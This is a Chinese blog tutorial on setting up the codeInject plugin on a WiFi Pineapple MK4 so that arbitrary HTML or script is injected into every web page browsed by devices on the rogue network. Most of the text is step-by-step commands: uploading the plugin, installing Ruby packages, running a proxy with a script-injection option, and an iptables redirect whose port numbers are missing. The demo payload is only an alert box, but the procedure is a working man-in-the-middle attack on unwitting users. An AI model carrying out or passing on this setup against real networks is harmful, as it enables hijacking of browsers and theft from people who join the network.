wifipineapple插件：codeInject的使用

　　如果在中间人攻击的时候， 能在用户的网页中插入任意代码， 可以说已经完成一半了

　　wifipineapple有个codeInject插件， 可以让连上这个网络所有设备浏览网页的时候， 在网页中插入任意html代码

　　但是目前我用的wifipineapple版本是MK4， 官方很久不维护这个版本的wifipineapple

　　使用scp把本地的codeinject传到wifipineapple的  /pineapple/components/infusions/目录下

scp -r codeinject root@172.16.42.1:/pineapple/components/infusions

　　然后把opkg的源改成：

http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/

　　执行

opkg update
opkg install ruby-cgi
opkg install ruby-core
opkg install ruby-enc
opkg install ruby-gems

　　cd进入 /pineapple/components/infusions/codeinject 目录，修正ruby执行socket， getAddrInfo的错误：

cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linux
ln -s /usb/usr/lib/ruby /usr/lib/ruby

　　cd进入  /pineapple/components/infusions/codeinject/includes/proxy 目录， 执行命令：

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/lib
export PATH=$PATH:/usb/usr/bin:/usb/usr/sbin

ruby -Kn proxy.rb --verbose --script-inject "<script>alert(1)</script>"

　　添加本地数据转发：

iptables -t nat -A PREROUTING  -i br-lan -p tcp --destination-port  -j REDIRECT --to-ports 

　　此时连接上该wifi所有用户，浏览网页的时候，会弹出弹窗：1

EOF

作者： NONO
出处：http://www.cnblogs.com/diligenceday/

企业网站：http://www.idrwl.com/
开源博客：http://www.github.com/sqqihao
QQ：287101329

微信：18101055830